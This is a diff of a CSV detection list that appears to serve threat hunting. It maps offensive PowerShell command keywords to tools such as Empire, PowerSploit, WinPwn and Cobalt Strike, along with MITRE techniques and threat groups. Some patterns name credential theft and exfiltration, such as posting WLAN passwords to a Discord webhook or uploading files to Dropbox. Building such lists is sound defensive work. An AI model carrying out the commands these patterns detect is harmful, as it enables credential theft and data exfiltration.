+"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*Invoke-Pwds.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
-"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
-"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*Invoke-RDPwrap.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
 "*Invoke-ReflectivePEInjection*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
-"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*Invoke-ReflectivePEInjection.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
-"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
-"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
-"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
-"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
-"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
 "*Invoke-ReverseSocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z"
 "*invokereverttoself*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
 "*Invoke-RevertToSelf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 